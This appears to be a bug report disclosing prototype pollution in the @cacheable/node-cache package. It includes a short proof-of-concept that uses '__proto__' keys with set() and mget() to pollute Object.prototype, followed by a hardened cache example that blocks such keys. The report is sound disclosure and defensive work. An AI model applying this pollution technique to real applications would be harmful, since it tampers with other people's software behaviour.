Describe the bug
The @cacheable/node-cache package is vulnerable to prototype pollution. An attacker can abuse the set() and mget() methods by using __proto__ as the cache key to modify the prototype of the internal data store object and propagate polluted properties to the prototype of the returned result object. This allows the attacker to inject arbitrary properties into Object.prototype, which can lead to unexpected behavior, property tampering, or other security issues across any application that uses this cache package.
How To Reproduce

Step 1: Install the vulnerable version of @cacheable/node-cache

npm install @cacheable/node-cache

Step 2: Run the following code snippet to reproduce the prototype pollution

// Import the cache library
const NodeCache = require('@cacheable/node-cache');

// Initialize a new cache instance
const cache = new NodeCache({});

// Step 1: Pollute the prototype using set() with __proto__ as the key
cache.set('__proto__', { polluted: true });

// Step 2: Retrieve the value using mget(), which propagates the pollution to the result object's prototype
const result = cache.mget(['__proto__']);

// Verify the prototype pollution - the Object prototype will now have the 'polluted' property
console.log(Object.prototype.polluted); // Output: true

Explanation of Reproduction
The set() method accepts __proto__ as a key and stores the attacker-controlled value ({ polluted: true }), modifying the prototype of the internal cache data store.
The mget() method retrieves the value associated with the __proto__ key and assigns it to result['__proto__'], which propagates the polluted property to the Object prototype (since __proto__ references the prototype chain).
After execution, Object.prototype.polluted will be true, confirming that the prototype pollution has occurred.
Cleanup (to avoid persistent pollution in test environments)
// Remove the polluted property from Object.prototype
delete Object.prototype.polluted;
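For comparison, here is an added example (written for this report, not code from @cacheable/node-cache) of a minimal cache whose set()/mget() pair closes the key-based vector described above: keys named __proto__, constructor or prototype are refused, the store is a Map rather than a plain object, and mget() assembles its result on a prototype-less object so a dangerous key could never reach Object.prototype. The SafeCache, assertSafeKey and pollutedPrototypeKeys names are assumptions of this example.

```javascript
// Added example, not the library's own code. Keys that name prototype
// machinery are rejected up front; a Map store has no property semantics
// at all, so '__proto__' could only ever be plain data there.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function assertSafeKey(key) {
  const isScalar = typeof key === 'string' || typeof key === 'number';
  if (!isScalar || FORBIDDEN_KEYS.has(String(key))) {
    throw new TypeError(`refusing unsafe cache key: ${String(key)}`);
  }
  return String(key);
}

class SafeCache {
  constructor() {
    this.store = new Map(); // not a plain object: no prototype chain to hit
  }

  set(key, value) {
    this.store.set(assertSafeKey(key), value);
    return true;
  }

  get(key) {
    return this.store.get(assertSafeKey(key));
  }

  // Result is created with Object.create(null): on such an object a
  // '__proto__' key would become an ordinary own property instead of
  // invoking the Object.prototype.__proto__ setter.
  mget(keys) {
    const result = Object.create(null);
    for (const key of keys) {
      const safe = assertSafeKey(key);
      if (this.store.has(safe)) {
        result[safe] = this.store.get(safe);
      }
    }
    return result;
  }
}

// Health check for test suites: a clean runtime has no enumerable own
// properties on Object.prototype, so any entry here signals pollution.
function pollutedPrototypeKeys() {
  return Object.keys(Object.prototype);
}

// Constructed usage: ordinary keys work, the dangerous one is rejected.
const safeCache = new SafeCache();
safeCache.set('user:1', { name: 'alice' });
const safeResult = safeCache.mget(['user:1', 'missing']);
```

Running the original reproduction against a plain object store and then calling pollutedPrototypeKeys() returns ['polluted'], which makes the check a useful regression test after upgrading.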